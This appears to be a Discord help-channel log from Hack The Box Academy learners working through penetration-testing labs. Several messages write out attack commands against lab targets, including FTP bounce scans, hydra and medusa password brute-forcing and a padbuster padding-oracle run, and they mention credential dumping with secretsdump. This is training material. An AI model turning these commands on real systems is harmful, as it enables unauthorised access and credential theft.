Help me when you reach 9/18 lol

did tha one. I did them a little out of order for extra learning to take the OSCP and eventullay the HTB exam.

I am stuck

Password attacks?

Even after setting the pivot with netsh

I can't get it on my Kali

btw the modules should be followed in the way they're in the path or is there a better way?

It is better to follow the order

I changed Vpn to US
Tried with remmina rdp

Even added the /d:DC flag for domain

I agree, I am doing only certain ones as a knowlege gaps. Practice on the module where I know I am weak like SQli. This is only becasue I have time constraint and am using the HTB academy to supplement my OSCP exam training.

That's is good you have different goal so it does not matter but for CPTS you have to follow order

💯

Thanks

Have y'all tried the SOC path yet? It's quite nice too

Making my way through CPTS after this

if you use a university email with subscription you don't have to pay for unlocking modules. but do you earn cubes from this modules?

I've just barely started it. Completed 2 modules and it's quite nice

You only get modules up to Tier 2 and yes you get cubes. I am using my student email as well.

oh is this specified in the subscription section? i didnt read it

You can gey CBBh and CPTS modules access as long as you have sub which is 8$ per month

yes

yes

Anyone to help me on this ?

....

Also the SOC path now.

you're on pivoting- I just started that section

i'll be happy to help once I get there m8

Okay sure thank you

Am trying to figure

Out if there is anything I can do to understand the issue

it's depend on what box you want to do, even box's without the CTF bs there is still a shit ton of box about all of the topic you can think of, so just do the module that have the same topic as the box you are looking to try your hand on

try sudo mount -t nfs (ip):/ /mnt -o nolock

still need help with this?

Desperately

which section?

Port forwarding with windows :Netsh

Under pivot around Obstacles

Last Question

you have an connection error try scanning that port to see if you even have access

also with pivot method like this one you desperately can't ping

I even changed the port

from 9090 and same issue

what port you are using isn't really important

the main thing if you have tunnel setup right or not

look about right nmap show anything?

Let me try that as well

that should be the first thing you try after the rdp failed 🤣

Why did not you tell me this Before

it's would be way more easier to debug knowing if you even have a connect to the target or not

#modules message

i didn't put "nmap" in that sentence so my bad (jk)

8080 is closed

9080 as well

just notice your ip that's the issue, for listenaddress= use the given target machine ip not your 🤣

NO WAYY

like if you think about it the how can you set the listen address to your kali because the given target doesn't have access or privilege to do that

I am extremely dumb man

i can not believe

no worries everything make dump mistakes

Hmm that is giving me the same error. I think it may be a problem with my VPN connection. I'm able to hit the server with ping and nmap, but my device IP is not in the same subnet. I imagine that may cause issues with permissions. Spinning up a VM now in the HTB subnet.

has anyone ran into issues interacting with machines over SSH? I'm consistently getting them to hang to the point of needing to kill the terminal tab anytime they have to send more than a few bytes' worth of data

I think I checked just about everything on my side; I have a stable connection, VPN is working too, ping and traceroute aren't showing any issues either (fwiw, this is the skills assessment for buffer overflows on x86 Linux)

Got the flag 😂😂😂😂😂

This is the Certified dump moment for me I will remember this whole life

you could try mounting with ||sudo|| privilege

can anyone kindly help me with the log rotate section of linux priv sec module?

How to take notes most effectively? I use Obsidian and is it good if I take notes like this and manage my notes in tree structures?

idk how to hack at all can anyone teach me

somone pls dm me to help

read the #rules if you generally want to learn cyber security then:

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

give this a try maybe #resources-tools message

hey did you slove this im doing this right now

not yet

nvm just solved it

can i dm u?

yeah sure

update: turns out that the VPN must have not been working correctly - I switched to the TCP variant and it instantly helped, just putting it out if anyone ever faces a similar issue

Hey guys,

I'm stuck on the Attacking Enterpresi Networks - Lateral Movement module. I have added the ilfserveradm user to the admin group but I still can't run PS nor mimikatz as Administrator. Ilfserveradm credentials don't seem to work :(. Not sure if I'm missing something..

There are quite a few times where the module instructs you to go to the bottom to start the target; if I'd like to suggest the ability to start the target from the sidemenu (where I can start the pwnbox) - where would I do that ?

The GPP-Password lab does not seem to execute the specified powershell script in the Windows Attack and Defense module, is there any help available? 🙂

Re-importing the module did the trick 🙂

I have a question working on a lab I used to copy paste the target from the module into the HTB machine on the site but now I can't any solutions to this

.\ runs the file it as a script :) You can do Import-Module Get-GPPPassword.ps1, then run the command Get-GPPPassword :)

Just a sanity check, but have any of you recently done sqlmap essentials recently, because I just found a flag from the flag5 table that I couldn't submit.

I ended up changing one of the characters in the flag text to make more sense, and that was submitted just fine. ||something_something_r19k_something_something -> something_something_r15k_something_something||

You're most likely not allowing the machine to read your clipboard. I had that issue one time as well

ATTACKING COMMON SERVICES: Attacking FTP
Question 2:
What username is available for the FTP server?

After nmap scan anonymous login is allwoed, so running this command
nmap -Pn -v -p80 -b anonymous:@<target IP:2121> <pwnbox ton0 ip>
OR
nmap -Pn -v -p22 -b anonymous:@<target IP:2121> <pwnbox ton0 ip>

After running above gives this :
Connected:Login credentials accepted by FTP server!
Initiating Bounce Scan at 05:13
Your FTP bounce server doesn't allow privileged ports, skipping them.
And you didn't want to scan any unprivileged ports. Giving up.
QUITTING!

Can anybody help me where I am wrong?

Did you try any other tools?

check the anonymous access of FTP server.

medusa -u anonymous -P pws.list -h <target IP> -n 2121 -M ftp
Got the password of the anonymous user but results the same thing

medusa?

what resources are given to you in the module to use?

user.list and pws.list

Problem is when trying to login in with normal or bounce back in the ftp it rejects even with valid creds

Don't know! -_-

Have you find the valid creds ?

yes for the anonymous:lxxxxxxl
something like this

Nope, With this files user.list and pws.list .

ok got in line...

Does it suppose to very long?

77 users vs 333 passwords combo

nope

try with hydra

ok

Was it a time based sql attack? I’ve had that happen on those before when the connection is unstable

I found the user name by hit and trial from the list but to find it's corresponding password used this:
hydra -l xxxx -P pws.list ftp://<target ip>:2121 -V
But it gives no password..

What I am doing wrong?

im guessing u got the wrong username

But academy accepted the user name in the second question

dm me

not too sure, was not running any verbosity, but I used the -D -T -C flags after enumerating for the specifics

just went back to the module ur using the wrong password list

@short hare have u checked the ftp service using anonymous access ?

in a time based SQL attack the tool measures how long it took the server to answer to extract each character of the flag one by one. This is something heavy dependent on a stable internet connection and I think I had the same issue at the time where it would return the wrong character here and there because of that.

right, thanks for the explanation. Just found it weird.

yes
brute forced it and got the password for anonymous user

anonymous user doesn't need a password

Connections are OK and target is LIVE but even after that

u didn't specify the port

^

ftp ip port

I really don't know what's is going on

refresh the page and check if the machine is still runnning

also vpn connection

Don't do ctrl-z

You're probably still connected to ftp in a different background session

Ping the ip

using PWN box
refreshed both pwn and traget but same thing

ok
but after nothing is happing

pinged and it's live

You are backgrounding the processes without knowing what it's actually doing

Try
ftp anonymous@ip port

It replys like that
ftp: anonymous@10.129.226.166: Name or service not known

Ah

Yeah ftp doesn't do user@

Should be just ftp ip port

hey hey now it's connceted

Your old target probably died

seriously just tried feew miniutes back it refused

no rested the target and tried

Also check your screenshot this looks like you may have typoed the old ip

Hi anyone done with zipping machine?

This isn't the place for #boxes read #welcome on how to access other channels

Okay thanks

Also: if you're trying to close out a connection or stop a process do ctrl-c

ok will keep that in mind

Solved

Thanks for the support..!!
@fathom pendant @coarse void @silver mesa @tidal mango

hi guys i have stucked with this question "using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt' " it is on windows command line module

i can't find waldo.txt anywhere

any tips or help?

use the find command

i have used " where /R C:\ waldo.txt

but it's shown could not find files for the given pattern(s).

i fill the blank answer with that result but still not the right answer

mb didn't saw it was for windows

where is the right command

yes it can. Still need the right port though if its not 21

I get the result with the same command

I just finished the sqlmap skills assesment, I managed to get the ||tamper script || mostly with pot luck, is there anyway to narrow down which one to use?

Hey French. Did you finish the SQLi module before that?

I did yes

Can I please DM u regarding the assessment?

sure

Thanks

hey guys, little stuck on the payload & shells module, specifically at the part where it concerns PHP web shells -- anyone able to help me out in dms?

tl;dr is that my website does not seem to recognise the directory on the rconfig server despite the shell file showing as uploaded on the database

never mind i am insanely stupid

Hey All, Could you help me with completing HTTPS/TLS attack skills assessment

What exactly is not working?

hey , on windows priv esc , Citrix Breakout section Im getting an error trying to import a module : PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
error : import-module : the specified module ‘PowerUp.ps1’ was not loaded because no valid module file was found in any module directory

Hi, currently working on Login Brute Forcing https://academy.hackthebox.com/module/57/section/516
Skills Assessment -Service login
I have found the employee and I created users list with username anarchy and passwd list with cupp.
Im doing mistake with filtering passwords according to conditions. can any help me with this

do u have any idea ?

it's about the second question of citrix section : Submit the Administrator's flag from C:\Users\Administrator\Desktop

I got the token but despite of what combination I give. I'm unable to decode the token

padbuster http://94.237.59.206:43498/token ||"0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3"|| 16 -encoding 2 -cookies ||"token=0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3||"-error " Decryption Error. Invalid Token! " -usebody
This is what I'm using

Any one

hi

hmmmm, cant dump NTDS with the created golden ticket, i need the hash of user "bross" -> https://academy.hackthebox.com/module/143/section/1508

Look at the options of padbuster again carefully.

You're trying to authenticate with CME to a user that doesn't exist. Try to instead use your created ticket with a different tool.

hmmm which one do you have in mind when dumping NTDS

secretsdump.py

ahhh right

thanks

could you let me know what I'm missing

Hello everyone. I'm stuck in the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the credentials of the user with GenericAll user and I try to ACL abuse but PowerView module doesn't work... I try the module in MS01, SQL01 and my kali using proxychains but all times the same erro.

Can anyone to help me?

dm

<@&861185840277487616> also in #cpts #cwes and #858470491676737536

After SELinux enforcing it blocks network interfaces

I have installed SELinux on an Ubuntu Pro Server with the following packages:

policycoreutils, selinux-utils, selinux-basics

The problem appears when I set SELinux policy to “enforcing”. My system loses network capabilities; when I run ‘ip addr show’ the only interface displayed is the loopback interface

Did anyone experience the same?
How did you overcome it?

Thanks.

anyone has any mail password cracking bruteforce

ik half of the password

and the number of digits

on 2 words in the password are missing

it is my old ID

🤨

read the #rules keep asking for thing like that and you will get the 👢

Lol

read #welcome and #rules after that use /verify at #bot-commands and ask that at #1024429874246590575

Hi all
Could you please give me a hint were I can find the URL of the WordPress instance? (Attacking Common Applications
Attacking Common Applications - Skills Assessment II)

I done all another questions and skill assessments but still can't find this one

if you've i answer the rest of the questions for that assessments then did you found the wordpress site?

also the answer format for this is http://(domain) with http:// and without the / at the end

u mean wp-admin?

how do I connect to the support chat , after pushing the 'contact support' button?

KOPRC\

admin ?

.yc Xec

uulyd

read #welcome and #rules keep spamming and you'll get the 👢 up your ass

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

by domain i mean the url

I'm working on Attacking Common Services Lab Hard. I was able to RDP into the target system with credentials I found. I then found an XML file containing a string in the format of a flag: "HTB_......." But that flag isn't accepted as the answer. Is it just a decoy flag?

Hello everyone
I have a problem, I'm going through the active directory module and there is such a problem.When I spawn instance and try to connect via rdp, I get such a black screen.At first I tried in my own kali, then I tried with attak box and restarted a couple of times

yep it's just HTB being evil

v

Haha nice, that's funny.

not sure if this will work but try with these 2 flag /cert:ignore /dynamic-resolution

omg,thanks,now working

nice 👍 👍

yeah its ok I found out what I was doing wrong it works like the VM provided in tryhackme

can you please explain exactly ? the link does not help. I see no option of sending a message

are you on academy or main platform?

how do I know that? not sure...

Im new. got the vip subscription

read #welcome and #rules after that use /verify at #bot-commands to verify your account, this channel is for HTB academy

you are on HTB main platform

im a hacker

i'm a ass eater

I used Chisel and Proxychains and then RDPed into the Host, poweview worked fine through GUI.

LMFAOO MFAL FAOM FAL MFAO LFAMO

https://tenor.com/view/chat-ordinateur-gif-20072205

guess what guys

Chicken but 🤠

anyone there